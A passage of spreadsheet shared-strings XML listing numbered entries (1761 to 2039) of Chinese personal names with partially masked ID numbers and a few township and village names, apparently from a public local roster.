  </si>
  <si>
    <t>张国军</t>
  </si>
  <si>
    <t>1761</t>
  </si>
  <si>
    <t>闫光耀</t>
  </si>
  <si>
    <t>1762</t>
  </si>
  <si>
    <t>闫文连</t>
  </si>
  <si>
    <t>412930********1789</t>
  </si>
  <si>
    <t>1763</t>
  </si>
  <si>
    <t>李秀芝</t>
  </si>
  <si>
    <t>1764</t>
  </si>
  <si>
    <t>张玉英</t>
  </si>
  <si>
    <t>412929********2942</t>
  </si>
  <si>
    <t>1765</t>
  </si>
  <si>
    <t>皇后乡</t>
  </si>
  <si>
    <t>李德运</t>
  </si>
  <si>
    <t>412921********201X</t>
  </si>
  <si>
    <t>4113210615</t>
  </si>
  <si>
    <t>1766</t>
  </si>
  <si>
    <t>杨丰兰</t>
  </si>
  <si>
    <t>412921********2020</t>
  </si>
  <si>
    <t>1767</t>
  </si>
  <si>
    <t>段庆印</t>
  </si>
  <si>
    <t>412921********2031</t>
  </si>
  <si>
    <t>1768</t>
  </si>
  <si>
    <t>乔国玺</t>
  </si>
  <si>
    <t>1769</t>
  </si>
  <si>
    <t>赵如贤</t>
  </si>
  <si>
    <t>412921********208X</t>
  </si>
  <si>
    <t>1770</t>
  </si>
  <si>
    <t>邱丰祥</t>
  </si>
  <si>
    <t>412921********2038</t>
  </si>
  <si>
    <t>1771</t>
  </si>
  <si>
    <t>魏书芳</t>
  </si>
  <si>
    <t>412921********2023</t>
  </si>
  <si>
    <t>1772</t>
  </si>
  <si>
    <t>张国凤</t>
  </si>
  <si>
    <t>412921********2048</t>
  </si>
  <si>
    <t>1773</t>
  </si>
  <si>
    <t>412921********202X</t>
  </si>
  <si>
    <t>1774</t>
  </si>
  <si>
    <t>刘建伟</t>
  </si>
  <si>
    <t>412921********2033</t>
  </si>
  <si>
    <t>1775</t>
  </si>
  <si>
    <t>乔运发</t>
  </si>
  <si>
    <t>412921********2017</t>
  </si>
  <si>
    <t>1776</t>
  </si>
  <si>
    <t>段召甫</t>
  </si>
  <si>
    <t>1777</t>
  </si>
  <si>
    <t>李好</t>
  </si>
  <si>
    <t>412921********2026</t>
  </si>
  <si>
    <t>1778</t>
  </si>
  <si>
    <t>刘香琴</t>
  </si>
  <si>
    <t>412921********2063</t>
  </si>
  <si>
    <t>1779</t>
  </si>
  <si>
    <t>石教明</t>
  </si>
  <si>
    <t>412921********2051</t>
  </si>
  <si>
    <t>1780</t>
  </si>
  <si>
    <t>段召宾</t>
  </si>
  <si>
    <t>412921********2010</t>
  </si>
  <si>
    <t>1781</t>
  </si>
  <si>
    <t>张运朝</t>
  </si>
  <si>
    <t>412921********2032</t>
  </si>
  <si>
    <t>1782</t>
  </si>
  <si>
    <t>卫洪信</t>
  </si>
  <si>
    <t>412921********2018</t>
  </si>
  <si>
    <t>1783</t>
  </si>
  <si>
    <t>王书芝</t>
  </si>
  <si>
    <t>412921********2045</t>
  </si>
  <si>
    <t>1784</t>
  </si>
  <si>
    <t>卫洪庆</t>
  </si>
  <si>
    <t>412921********2052</t>
  </si>
  <si>
    <t>1785</t>
  </si>
  <si>
    <t>李巧</t>
  </si>
  <si>
    <t>412921********4028</t>
  </si>
  <si>
    <t>1786</t>
  </si>
  <si>
    <t>任保军</t>
  </si>
  <si>
    <t>412921********2014</t>
  </si>
  <si>
    <t>1787</t>
  </si>
  <si>
    <t>段庆红</t>
  </si>
  <si>
    <t>1788</t>
  </si>
  <si>
    <t>乔国珍</t>
  </si>
  <si>
    <t>412921********2037</t>
  </si>
  <si>
    <t>1789</t>
  </si>
  <si>
    <t>肖爱花</t>
  </si>
  <si>
    <t>412921********2027</t>
  </si>
  <si>
    <t>1790</t>
  </si>
  <si>
    <t>刘中原</t>
  </si>
  <si>
    <t>1791</t>
  </si>
  <si>
    <t>司金花</t>
  </si>
  <si>
    <t>412921********2089</t>
  </si>
  <si>
    <t>1792</t>
  </si>
  <si>
    <t>朱洪来</t>
  </si>
  <si>
    <t>1793</t>
  </si>
  <si>
    <t>邱喜转</t>
  </si>
  <si>
    <t>412921********2085</t>
  </si>
  <si>
    <t>1794</t>
  </si>
  <si>
    <t>1795</t>
  </si>
  <si>
    <t>马桂勤</t>
  </si>
  <si>
    <t>412921********2024</t>
  </si>
  <si>
    <t>1796</t>
  </si>
  <si>
    <t>刘金太</t>
  </si>
  <si>
    <t>1797</t>
  </si>
  <si>
    <t>朱清芝</t>
  </si>
  <si>
    <t>412921********204X</t>
  </si>
  <si>
    <t>1798</t>
  </si>
  <si>
    <t>卫天秀</t>
  </si>
  <si>
    <t>412921********2012</t>
  </si>
  <si>
    <t>1799</t>
  </si>
  <si>
    <t>朱齐玲</t>
  </si>
  <si>
    <t>1800</t>
  </si>
  <si>
    <t>段庆才</t>
  </si>
  <si>
    <t>412921********207X</t>
  </si>
  <si>
    <t>1801</t>
  </si>
  <si>
    <t>潘素玲</t>
  </si>
  <si>
    <t>412921********2044</t>
  </si>
  <si>
    <t>1802</t>
  </si>
  <si>
    <t>胡松奇</t>
  </si>
  <si>
    <t>412921********2056</t>
  </si>
  <si>
    <t>1803</t>
  </si>
  <si>
    <t>刘金香</t>
  </si>
  <si>
    <t>412921********2540</t>
  </si>
  <si>
    <t>1804</t>
  </si>
  <si>
    <t>殷书春</t>
  </si>
  <si>
    <t>412921********2050</t>
  </si>
  <si>
    <t>1805</t>
  </si>
  <si>
    <t>段庆先</t>
  </si>
  <si>
    <t>412921********2060</t>
  </si>
  <si>
    <t>1806</t>
  </si>
  <si>
    <t>刘金兰</t>
  </si>
  <si>
    <t>1807</t>
  </si>
  <si>
    <t>刘运军</t>
  </si>
  <si>
    <t>412921********2016</t>
  </si>
  <si>
    <t>1808</t>
  </si>
  <si>
    <t>卫天强</t>
  </si>
  <si>
    <t>412921********2013</t>
  </si>
  <si>
    <t>1809</t>
  </si>
  <si>
    <t>闫俊敏</t>
  </si>
  <si>
    <t>412921********2069</t>
  </si>
  <si>
    <t>1810</t>
  </si>
  <si>
    <t>段庆万</t>
  </si>
  <si>
    <t>1811</t>
  </si>
  <si>
    <t>412921********2040</t>
  </si>
  <si>
    <t>1812</t>
  </si>
  <si>
    <t>李国兰</t>
  </si>
  <si>
    <t>412921********2025</t>
  </si>
  <si>
    <t>1813</t>
  </si>
  <si>
    <t>朱佳琳</t>
  </si>
  <si>
    <t>411326********2029</t>
  </si>
  <si>
    <t>1814</t>
  </si>
  <si>
    <t>段庆亮</t>
  </si>
  <si>
    <t>412921********2011</t>
  </si>
  <si>
    <t>1815</t>
  </si>
  <si>
    <t>陈明会</t>
  </si>
  <si>
    <t>412921********2029</t>
  </si>
  <si>
    <t>1816</t>
  </si>
  <si>
    <t>朱荣梅</t>
  </si>
  <si>
    <t>412921********2028</t>
  </si>
  <si>
    <t>1817</t>
  </si>
  <si>
    <t>朱洪军</t>
  </si>
  <si>
    <t>412921********2034</t>
  </si>
  <si>
    <t>1818</t>
  </si>
  <si>
    <t>袁金华</t>
  </si>
  <si>
    <t>1819</t>
  </si>
  <si>
    <t>段召玲</t>
  </si>
  <si>
    <t>1820</t>
  </si>
  <si>
    <t>徐付营</t>
  </si>
  <si>
    <t>411321********2023</t>
  </si>
  <si>
    <t>1821</t>
  </si>
  <si>
    <t>段庆成</t>
  </si>
  <si>
    <t>1822</t>
  </si>
  <si>
    <t>王华</t>
  </si>
  <si>
    <t>412921********2066</t>
  </si>
  <si>
    <t>1823</t>
  </si>
  <si>
    <t>袁福国</t>
  </si>
  <si>
    <t>1824</t>
  </si>
  <si>
    <t>马希勤</t>
  </si>
  <si>
    <t>1825</t>
  </si>
  <si>
    <t>乔花青</t>
  </si>
  <si>
    <t>412921********2081</t>
  </si>
  <si>
    <t>1826</t>
  </si>
  <si>
    <t>王永志</t>
  </si>
  <si>
    <t>1827</t>
  </si>
  <si>
    <t>张桂玲</t>
  </si>
  <si>
    <t>412921********2043</t>
  </si>
  <si>
    <t>1828</t>
  </si>
  <si>
    <t>袁天宝</t>
  </si>
  <si>
    <t>412921********2036</t>
  </si>
  <si>
    <t>1829</t>
  </si>
  <si>
    <t>胡国云</t>
  </si>
  <si>
    <t>1830</t>
  </si>
  <si>
    <t>张广先</t>
  </si>
  <si>
    <t>1831</t>
  </si>
  <si>
    <t>殷金玲</t>
  </si>
  <si>
    <t>412921********2047</t>
  </si>
  <si>
    <t>1832</t>
  </si>
  <si>
    <t>牛金瑞</t>
  </si>
  <si>
    <t>1833</t>
  </si>
  <si>
    <t>朱清德</t>
  </si>
  <si>
    <t>412921********2039</t>
  </si>
  <si>
    <t>1834</t>
  </si>
  <si>
    <t>陈广娥</t>
  </si>
  <si>
    <t>1835</t>
  </si>
  <si>
    <t>李永银</t>
  </si>
  <si>
    <t>1836</t>
  </si>
  <si>
    <t>段召记</t>
  </si>
  <si>
    <t>1837</t>
  </si>
  <si>
    <t>张文芝</t>
  </si>
  <si>
    <t>1838</t>
  </si>
  <si>
    <t>曹付国</t>
  </si>
  <si>
    <t>412921********2035</t>
  </si>
  <si>
    <t>1839</t>
  </si>
  <si>
    <t>袁斌宏</t>
  </si>
  <si>
    <t>1840</t>
  </si>
  <si>
    <t>段庆强</t>
  </si>
  <si>
    <t>1841</t>
  </si>
  <si>
    <t>袁海燕</t>
  </si>
  <si>
    <t>1842</t>
  </si>
  <si>
    <t>邱向东</t>
  </si>
  <si>
    <t>1843</t>
  </si>
  <si>
    <t>张国如</t>
  </si>
  <si>
    <t>412921********2021</t>
  </si>
  <si>
    <t>1844</t>
  </si>
  <si>
    <t>邱喜成</t>
  </si>
  <si>
    <t>412921********2074</t>
  </si>
  <si>
    <t>1845</t>
  </si>
  <si>
    <t>李国玲</t>
  </si>
  <si>
    <t>1846</t>
  </si>
  <si>
    <t>常开路</t>
  </si>
  <si>
    <t>1847</t>
  </si>
  <si>
    <t>卫天勤</t>
  </si>
  <si>
    <t>1848</t>
  </si>
  <si>
    <t>魏敏</t>
  </si>
  <si>
    <t>1849</t>
  </si>
  <si>
    <t>卫金华</t>
  </si>
  <si>
    <t>1850</t>
  </si>
  <si>
    <t>申庆丽</t>
  </si>
  <si>
    <t>1851</t>
  </si>
  <si>
    <t>邱海清</t>
  </si>
  <si>
    <t>412921********2053</t>
  </si>
  <si>
    <t>1852</t>
  </si>
  <si>
    <t>康俊坡</t>
  </si>
  <si>
    <t>412921********203X</t>
  </si>
  <si>
    <t>1853</t>
  </si>
  <si>
    <t>袁爱云</t>
  </si>
  <si>
    <t>1854</t>
  </si>
  <si>
    <t>段召贵</t>
  </si>
  <si>
    <t>1855</t>
  </si>
  <si>
    <t>刘玉梅</t>
  </si>
  <si>
    <t>1856</t>
  </si>
  <si>
    <t>段庆生</t>
  </si>
  <si>
    <t>1857</t>
  </si>
  <si>
    <t>高金凤</t>
  </si>
  <si>
    <t>1858</t>
  </si>
  <si>
    <t>段庆安</t>
  </si>
  <si>
    <t>1859</t>
  </si>
  <si>
    <t>412921********2068</t>
  </si>
  <si>
    <t>1860</t>
  </si>
  <si>
    <t>刘长波</t>
  </si>
  <si>
    <t>1861</t>
  </si>
  <si>
    <t>任桂云</t>
  </si>
  <si>
    <t>1862</t>
  </si>
  <si>
    <t>曹喜安</t>
  </si>
  <si>
    <t>1863</t>
  </si>
  <si>
    <t>1864</t>
  </si>
  <si>
    <t>訾华</t>
  </si>
  <si>
    <t>410423********4025</t>
  </si>
  <si>
    <t>1865</t>
  </si>
  <si>
    <t>刘闪娜</t>
  </si>
  <si>
    <t>411326********2025</t>
  </si>
  <si>
    <t>1866</t>
  </si>
  <si>
    <t>曹帅</t>
  </si>
  <si>
    <t>1867</t>
  </si>
  <si>
    <t>卫天玉</t>
  </si>
  <si>
    <t>412921********2059</t>
  </si>
  <si>
    <t>1868</t>
  </si>
  <si>
    <t>李成珍</t>
  </si>
  <si>
    <t>412921********2049</t>
  </si>
  <si>
    <t>1869</t>
  </si>
  <si>
    <t>袁金玉</t>
  </si>
  <si>
    <t>412921********2030</t>
  </si>
  <si>
    <t>1870</t>
  </si>
  <si>
    <t>任金花</t>
  </si>
  <si>
    <t>412921********2106</t>
  </si>
  <si>
    <t>1871</t>
  </si>
  <si>
    <t>刘运杰</t>
  </si>
  <si>
    <t>412921********2071</t>
  </si>
  <si>
    <t>1872</t>
  </si>
  <si>
    <t>朱洪花</t>
  </si>
  <si>
    <t>1873</t>
  </si>
  <si>
    <t>袁金玲</t>
  </si>
  <si>
    <t>1874</t>
  </si>
  <si>
    <t>张天阁</t>
  </si>
  <si>
    <t>1875</t>
  </si>
  <si>
    <t>袁金会</t>
  </si>
  <si>
    <t>1876</t>
  </si>
  <si>
    <t>朱国成</t>
  </si>
  <si>
    <t>412921********2076</t>
  </si>
  <si>
    <t>1877</t>
  </si>
  <si>
    <t>袁天平</t>
  </si>
  <si>
    <t>412921********2046</t>
  </si>
  <si>
    <t>1878</t>
  </si>
  <si>
    <t>乔振东</t>
  </si>
  <si>
    <t>1879</t>
  </si>
  <si>
    <t>伍延兰</t>
  </si>
  <si>
    <t>1880</t>
  </si>
  <si>
    <t>任保海</t>
  </si>
  <si>
    <t>412921********2015</t>
  </si>
  <si>
    <t>1881</t>
  </si>
  <si>
    <t>李四营</t>
  </si>
  <si>
    <t>1882</t>
  </si>
  <si>
    <t>任金亮</t>
  </si>
  <si>
    <t>1883</t>
  </si>
  <si>
    <t>刘运芝</t>
  </si>
  <si>
    <t>1884</t>
  </si>
  <si>
    <t>乔国勇</t>
  </si>
  <si>
    <t>1885</t>
  </si>
  <si>
    <t>冯树勤</t>
  </si>
  <si>
    <t>1886</t>
  </si>
  <si>
    <t>卫金生</t>
  </si>
  <si>
    <t>1887</t>
  </si>
  <si>
    <t>姜云焕</t>
  </si>
  <si>
    <t>412921********2428</t>
  </si>
  <si>
    <t>1888</t>
  </si>
  <si>
    <t>曹付生</t>
  </si>
  <si>
    <t>1889</t>
  </si>
  <si>
    <t>刘广敏</t>
  </si>
  <si>
    <t>1890</t>
  </si>
  <si>
    <t>张春朝</t>
  </si>
  <si>
    <t>1891</t>
  </si>
  <si>
    <t>刘玉先</t>
  </si>
  <si>
    <t>1892</t>
  </si>
  <si>
    <t>张予芊彤</t>
  </si>
  <si>
    <t>411321********2046</t>
  </si>
  <si>
    <t>1893</t>
  </si>
  <si>
    <t>王小浩</t>
  </si>
  <si>
    <t>412921********1110</t>
  </si>
  <si>
    <t>1894</t>
  </si>
  <si>
    <t>张广丽</t>
  </si>
  <si>
    <t>412921********1180</t>
  </si>
  <si>
    <t>1895</t>
  </si>
  <si>
    <t>曹春芝</t>
  </si>
  <si>
    <t>1896</t>
  </si>
  <si>
    <t>刘金海</t>
  </si>
  <si>
    <t>1897</t>
  </si>
  <si>
    <t>康真真</t>
  </si>
  <si>
    <t>411326********2061</t>
  </si>
  <si>
    <t>1898</t>
  </si>
  <si>
    <t>康徽</t>
  </si>
  <si>
    <t>411321********5277</t>
  </si>
  <si>
    <t>1899</t>
  </si>
  <si>
    <t>张有强</t>
  </si>
  <si>
    <t>1900</t>
  </si>
  <si>
    <t>段庆凤</t>
  </si>
  <si>
    <t>412921********2041</t>
  </si>
  <si>
    <t>1901</t>
  </si>
  <si>
    <t>张春青</t>
  </si>
  <si>
    <t>1902</t>
  </si>
  <si>
    <t>袁绪英</t>
  </si>
  <si>
    <t>1903</t>
  </si>
  <si>
    <t>曹春玲</t>
  </si>
  <si>
    <t>1904</t>
  </si>
  <si>
    <t>任保奇</t>
  </si>
  <si>
    <t>1905</t>
  </si>
  <si>
    <t>段兆君</t>
  </si>
  <si>
    <t>412921********2431</t>
  </si>
  <si>
    <t>1906</t>
  </si>
  <si>
    <t xml:space="preserve">郑小华  </t>
  </si>
  <si>
    <t>412921********2022</t>
  </si>
  <si>
    <t>1907</t>
  </si>
  <si>
    <t>段庆阳</t>
  </si>
  <si>
    <t>412921********2058</t>
  </si>
  <si>
    <t>1908</t>
  </si>
  <si>
    <t>朱清霞</t>
  </si>
  <si>
    <t>1909</t>
  </si>
  <si>
    <t>袁绪锋</t>
  </si>
  <si>
    <t>1910</t>
  </si>
  <si>
    <t>高书云</t>
  </si>
  <si>
    <t>1911</t>
  </si>
  <si>
    <t>朱洪祥</t>
  </si>
  <si>
    <t>1912</t>
  </si>
  <si>
    <t>贾书勤</t>
  </si>
  <si>
    <t>412921********2401</t>
  </si>
  <si>
    <t>1913</t>
  </si>
  <si>
    <t>杨明贵</t>
  </si>
  <si>
    <t>1914</t>
  </si>
  <si>
    <t>朱洪霞</t>
  </si>
  <si>
    <t>1915</t>
  </si>
  <si>
    <t>刘朱鑫</t>
  </si>
  <si>
    <t>411321********2024</t>
  </si>
  <si>
    <t>1916</t>
  </si>
  <si>
    <t>卫金中</t>
  </si>
  <si>
    <t>1917</t>
  </si>
  <si>
    <t>马延文</t>
  </si>
  <si>
    <t>1918</t>
  </si>
  <si>
    <t>曹付荣</t>
  </si>
  <si>
    <t>412921********2042</t>
  </si>
  <si>
    <t>1919</t>
  </si>
  <si>
    <t>卫金涛</t>
  </si>
  <si>
    <t>1920</t>
  </si>
  <si>
    <t>贺娜</t>
  </si>
  <si>
    <t>1921</t>
  </si>
  <si>
    <t>马延亮</t>
  </si>
  <si>
    <t>1922</t>
  </si>
  <si>
    <t>张保安</t>
  </si>
  <si>
    <t>1923</t>
  </si>
  <si>
    <t>张明华</t>
  </si>
  <si>
    <t>1924</t>
  </si>
  <si>
    <t>金霞</t>
  </si>
  <si>
    <t>412921********4428</t>
  </si>
  <si>
    <t>1925</t>
  </si>
  <si>
    <t>袁金龙</t>
  </si>
  <si>
    <t>1926</t>
  </si>
  <si>
    <t>袁文涛</t>
  </si>
  <si>
    <t>411321********6233</t>
  </si>
  <si>
    <t>1927</t>
  </si>
  <si>
    <t>邱喜梅</t>
  </si>
  <si>
    <t>1928</t>
  </si>
  <si>
    <t>文恒强</t>
  </si>
  <si>
    <t>412727********7472</t>
  </si>
  <si>
    <t>1929</t>
  </si>
  <si>
    <t>文静</t>
  </si>
  <si>
    <t>412727********7460</t>
  </si>
  <si>
    <t>1930</t>
  </si>
  <si>
    <t>訾延生</t>
  </si>
  <si>
    <t>412921********209X</t>
  </si>
  <si>
    <t>1931</t>
  </si>
  <si>
    <t>常丽</t>
  </si>
  <si>
    <t>411326********2047</t>
  </si>
  <si>
    <t>1932</t>
  </si>
  <si>
    <t>刘子芝</t>
  </si>
  <si>
    <t>411321********2027</t>
  </si>
  <si>
    <t>1933</t>
  </si>
  <si>
    <t>刘明嘉</t>
  </si>
  <si>
    <t>1934</t>
  </si>
  <si>
    <t>乔国娥</t>
  </si>
  <si>
    <t>1935</t>
  </si>
  <si>
    <t>刘立阳</t>
  </si>
  <si>
    <t>1936</t>
  </si>
  <si>
    <t>刘振方</t>
  </si>
  <si>
    <t>411326********2022</t>
  </si>
  <si>
    <t>1937</t>
  </si>
  <si>
    <t>张艺杭</t>
  </si>
  <si>
    <t>411322********293X</t>
  </si>
  <si>
    <t>1938</t>
  </si>
  <si>
    <t>张艺鑫</t>
  </si>
  <si>
    <t>411322********0085</t>
  </si>
  <si>
    <t>1939</t>
  </si>
  <si>
    <t>尚兰英</t>
  </si>
  <si>
    <t>1940</t>
  </si>
  <si>
    <t>王梅兰</t>
  </si>
  <si>
    <t>1941</t>
  </si>
  <si>
    <t>乔明卿</t>
  </si>
  <si>
    <t>1942</t>
  </si>
  <si>
    <t>殷金焕</t>
  </si>
  <si>
    <t>1943</t>
  </si>
  <si>
    <t>段庆玲</t>
  </si>
  <si>
    <t>412921********1141</t>
  </si>
  <si>
    <t>1944</t>
  </si>
  <si>
    <t>张琳琳</t>
  </si>
  <si>
    <t>411321********5967</t>
  </si>
  <si>
    <t>1945</t>
  </si>
  <si>
    <t>任金红</t>
  </si>
  <si>
    <t>1946</t>
  </si>
  <si>
    <t>牛娜</t>
  </si>
  <si>
    <t>411326********2041</t>
  </si>
  <si>
    <t>1947</t>
  </si>
  <si>
    <t>袁付巧</t>
  </si>
  <si>
    <t>1948</t>
  </si>
  <si>
    <t>袁天三</t>
  </si>
  <si>
    <t>1949</t>
  </si>
  <si>
    <t>王娥红</t>
  </si>
  <si>
    <t>1950</t>
  </si>
  <si>
    <t>刘广艳</t>
  </si>
  <si>
    <t>1951</t>
  </si>
  <si>
    <t>李仁跃</t>
  </si>
  <si>
    <t>1952</t>
  </si>
  <si>
    <t xml:space="preserve">李怡晨 </t>
  </si>
  <si>
    <t>411321********012X</t>
  </si>
  <si>
    <t>1953</t>
  </si>
  <si>
    <t>臧营</t>
  </si>
  <si>
    <t>412921********1603</t>
  </si>
  <si>
    <t>1954</t>
  </si>
  <si>
    <t>王玉芹</t>
  </si>
  <si>
    <t>1955</t>
  </si>
  <si>
    <t>段召兰</t>
  </si>
  <si>
    <t>1956</t>
  </si>
  <si>
    <t xml:space="preserve">曹满   </t>
  </si>
  <si>
    <t>411326********2071</t>
  </si>
  <si>
    <t>1957</t>
  </si>
  <si>
    <t>卫天丽</t>
  </si>
  <si>
    <t>1958</t>
  </si>
  <si>
    <t>尚广坤</t>
  </si>
  <si>
    <t>411321********2039</t>
  </si>
  <si>
    <t>1959</t>
  </si>
  <si>
    <t>卫金朝</t>
  </si>
  <si>
    <t>411326********2011</t>
  </si>
  <si>
    <t>1960</t>
  </si>
  <si>
    <t>张长运</t>
  </si>
  <si>
    <t>412921********2073</t>
  </si>
  <si>
    <t>1961</t>
  </si>
  <si>
    <t>袁绪旺</t>
  </si>
  <si>
    <t>1962</t>
  </si>
  <si>
    <t>高峰</t>
  </si>
  <si>
    <t>412921********1165</t>
  </si>
  <si>
    <t>1963</t>
  </si>
  <si>
    <t>张运花</t>
  </si>
  <si>
    <t>1964</t>
  </si>
  <si>
    <t>袁金长</t>
  </si>
  <si>
    <t>412921********2072</t>
  </si>
  <si>
    <t>1965</t>
  </si>
  <si>
    <t>乔国文</t>
  </si>
  <si>
    <t>1966</t>
  </si>
  <si>
    <t>张明珍</t>
  </si>
  <si>
    <t>412921********2205</t>
  </si>
  <si>
    <t>1967</t>
  </si>
  <si>
    <t>李长勉</t>
  </si>
  <si>
    <t>412921********2062</t>
  </si>
  <si>
    <t>1968</t>
  </si>
  <si>
    <t>张海玲</t>
  </si>
  <si>
    <t>1969</t>
  </si>
  <si>
    <t>邱小成</t>
  </si>
  <si>
    <t>412921********2110</t>
  </si>
  <si>
    <t>1970</t>
  </si>
  <si>
    <t>段明芝</t>
  </si>
  <si>
    <t>1971</t>
  </si>
  <si>
    <t>朱占君</t>
  </si>
  <si>
    <t>411326********2053</t>
  </si>
  <si>
    <t>1972</t>
  </si>
  <si>
    <t>刘金华</t>
  </si>
  <si>
    <t>1973</t>
  </si>
  <si>
    <t>任金东</t>
  </si>
  <si>
    <t>1974</t>
  </si>
  <si>
    <t>王梅英</t>
  </si>
  <si>
    <t>412921********2086</t>
  </si>
  <si>
    <t>1975</t>
  </si>
  <si>
    <t>柳花棉</t>
  </si>
  <si>
    <t>412922********136X</t>
  </si>
  <si>
    <t>1976</t>
  </si>
  <si>
    <t>朱启程</t>
  </si>
  <si>
    <t>411326********2018</t>
  </si>
  <si>
    <t>1977</t>
  </si>
  <si>
    <t>袁天刚</t>
  </si>
  <si>
    <t>1978</t>
  </si>
  <si>
    <t>张志伦</t>
  </si>
  <si>
    <t>1979</t>
  </si>
  <si>
    <t>袁绪霞</t>
  </si>
  <si>
    <t>1980</t>
  </si>
  <si>
    <t>乔永刚</t>
  </si>
  <si>
    <t>411326********2019</t>
  </si>
  <si>
    <t>1981</t>
  </si>
  <si>
    <t>尹玉兰</t>
  </si>
  <si>
    <t>412921********2065</t>
  </si>
  <si>
    <t>1982</t>
  </si>
  <si>
    <t>袁源</t>
  </si>
  <si>
    <t>411326********2024</t>
  </si>
  <si>
    <t>1983</t>
  </si>
  <si>
    <t>王浩然</t>
  </si>
  <si>
    <t>411321********0094</t>
  </si>
  <si>
    <t>1984</t>
  </si>
  <si>
    <t>王煜佳</t>
  </si>
  <si>
    <t>411321********2885</t>
  </si>
  <si>
    <t>1985</t>
  </si>
  <si>
    <t>王致远</t>
  </si>
  <si>
    <t>1986</t>
  </si>
  <si>
    <t>袁小瑞</t>
  </si>
  <si>
    <t>1987</t>
  </si>
  <si>
    <t>袁付平</t>
  </si>
  <si>
    <t>1988</t>
  </si>
  <si>
    <t>乔振才</t>
  </si>
  <si>
    <t>1989</t>
  </si>
  <si>
    <t>朱清花</t>
  </si>
  <si>
    <t>1990</t>
  </si>
  <si>
    <t>袁天才</t>
  </si>
  <si>
    <t>1991</t>
  </si>
  <si>
    <t>邱喜朵</t>
  </si>
  <si>
    <t>1992</t>
  </si>
  <si>
    <t>段庆娥</t>
  </si>
  <si>
    <t>1993</t>
  </si>
  <si>
    <t>袁周来</t>
  </si>
  <si>
    <t>1994</t>
  </si>
  <si>
    <t>段庆明</t>
  </si>
  <si>
    <t>412921********2179</t>
  </si>
  <si>
    <t>1995</t>
  </si>
  <si>
    <t>尚小燕</t>
  </si>
  <si>
    <t>411326********204X</t>
  </si>
  <si>
    <t>1996</t>
  </si>
  <si>
    <t>胡朝君</t>
  </si>
  <si>
    <t>411321********5958</t>
  </si>
  <si>
    <t>1997</t>
  </si>
  <si>
    <t>杨建云</t>
  </si>
  <si>
    <t>1998</t>
  </si>
  <si>
    <t>方运杰</t>
  </si>
  <si>
    <t>1999</t>
  </si>
  <si>
    <t>景淑兰</t>
  </si>
  <si>
    <t>2000</t>
  </si>
  <si>
    <t>孙俊</t>
  </si>
  <si>
    <t>2001</t>
  </si>
  <si>
    <t>陈秀勉</t>
  </si>
  <si>
    <t>2002</t>
  </si>
  <si>
    <t>赵书彬</t>
  </si>
  <si>
    <t>411326********2010</t>
  </si>
  <si>
    <t>2003</t>
  </si>
  <si>
    <t>赵书晗</t>
  </si>
  <si>
    <t>411321********202X</t>
  </si>
  <si>
    <t>2004</t>
  </si>
  <si>
    <t>马延玉</t>
  </si>
  <si>
    <t>2005</t>
  </si>
  <si>
    <t>张道霞</t>
  </si>
  <si>
    <t>2006</t>
  </si>
  <si>
    <t>张宁馨</t>
  </si>
  <si>
    <t>411321********2047</t>
  </si>
  <si>
    <t>2007</t>
  </si>
  <si>
    <t>卫金超</t>
  </si>
  <si>
    <t>411326********2015</t>
  </si>
  <si>
    <t>2008</t>
  </si>
  <si>
    <t>任丰娟</t>
  </si>
  <si>
    <t>411326********2045</t>
  </si>
  <si>
    <t>2009</t>
  </si>
  <si>
    <t>卫凤萱</t>
  </si>
  <si>
    <t>411321********2247</t>
  </si>
  <si>
    <t>2010</t>
  </si>
  <si>
    <t>乔洪卿</t>
  </si>
  <si>
    <t>2011</t>
  </si>
  <si>
    <t>张秋英</t>
  </si>
  <si>
    <t>2012</t>
  </si>
  <si>
    <t>袁斌勤</t>
  </si>
  <si>
    <t>2013</t>
  </si>
  <si>
    <t>杨付英</t>
  </si>
  <si>
    <t>2014</t>
  </si>
  <si>
    <t>段庆勤</t>
  </si>
  <si>
    <t>2015</t>
  </si>
  <si>
    <t>李丰先</t>
  </si>
  <si>
    <t>2016</t>
  </si>
  <si>
    <t>袁秀昱</t>
  </si>
  <si>
    <t>411321********0206</t>
  </si>
  <si>
    <t>2017</t>
  </si>
  <si>
    <t>宁文英</t>
  </si>
  <si>
    <t>2018</t>
  </si>
  <si>
    <t>段庆贵</t>
  </si>
  <si>
    <t>2019</t>
  </si>
  <si>
    <t>邱海中</t>
  </si>
  <si>
    <t>2020</t>
  </si>
  <si>
    <t>邱海亮</t>
  </si>
  <si>
    <t>2021</t>
  </si>
  <si>
    <t>袁斌虎</t>
  </si>
  <si>
    <t>2022</t>
  </si>
  <si>
    <t>教育局</t>
  </si>
  <si>
    <t>黄金保</t>
  </si>
  <si>
    <t>4113210699</t>
  </si>
  <si>
    <t>2023</t>
  </si>
  <si>
    <t>郑艳</t>
  </si>
  <si>
    <t>412921********2083</t>
  </si>
  <si>
    <t>2024</t>
  </si>
  <si>
    <t>商业中心</t>
  </si>
  <si>
    <t>文建军</t>
  </si>
  <si>
    <t>2025</t>
  </si>
  <si>
    <t>县社</t>
  </si>
  <si>
    <t>卫光明</t>
  </si>
  <si>
    <t>2026</t>
  </si>
  <si>
    <t>王炳娥</t>
  </si>
  <si>
    <t>2027</t>
  </si>
  <si>
    <t>皇后乡宏扬居委会</t>
  </si>
  <si>
    <t>曹付军</t>
  </si>
  <si>
    <t>2028</t>
  </si>
  <si>
    <t>范国敏</t>
  </si>
  <si>
    <t>412921********2100</t>
  </si>
  <si>
    <t>2029</t>
  </si>
  <si>
    <t>杨全胜</t>
  </si>
  <si>
    <t>412921********2093</t>
  </si>
  <si>
    <t>2030</t>
  </si>
  <si>
    <t>曹东杰</t>
  </si>
  <si>
    <t>2031</t>
  </si>
  <si>
    <t>杨佳钦</t>
  </si>
  <si>
    <t>411326********1562</t>
  </si>
  <si>
    <t>2032</t>
  </si>
  <si>
    <t>王胜利</t>
  </si>
  <si>
    <t>2033</t>
  </si>
  <si>
    <t>太山庙乡</t>
  </si>
  <si>
    <t>毛庄村</t>
  </si>
  <si>
    <t>宋海云</t>
  </si>
  <si>
    <t>412921********2423</t>
  </si>
  <si>
    <t>2034</t>
  </si>
  <si>
    <t>张宗玉</t>
  </si>
  <si>
    <t>2035</t>
  </si>
  <si>
    <t>张明林</t>
  </si>
  <si>
    <t>412921********2455</t>
  </si>
  <si>
    <t>2036</t>
  </si>
  <si>
    <t>王申聚</t>
  </si>
  <si>
    <t>412921********2418</t>
  </si>
  <si>
    <t>2037</t>
  </si>
  <si>
    <t>王申志</t>
  </si>
  <si>
    <t>2038</t>
  </si>
  <si>
    <t>潘希九</t>
  </si>
  <si>
    <t>412921********2438</t>
  </si>
  <si>
    <t>2039</t>
  </si>
  <si>
